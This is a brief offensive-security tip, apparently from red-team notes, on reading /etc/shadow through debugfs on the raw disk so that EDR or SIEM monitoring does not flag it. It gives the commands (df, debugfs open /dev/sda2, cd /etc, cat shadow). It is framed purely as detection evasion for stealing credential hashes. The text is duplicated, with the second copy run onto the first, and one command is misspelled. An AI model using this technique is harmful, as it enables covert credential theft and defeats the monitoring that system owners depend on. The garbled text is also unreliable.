To avoid that EDR or SIEM flagging Linux commands when reading sensitive files like /etc/shadow, the files should be read from raw disk.
$ df /
$ debugsfs
debugfs: open /dev/sda2
debugfs: cd /etc
debugfs: cat shadowTo avoid that EDR or SIEM flagging Linux commands when reading sensitive files like /etc/shadow, the files should be read from raw disk.
$ df /
$ debugsfs
debugfs: open /dev/sda2
debugfs: cd /etc
debugfs: cat shadow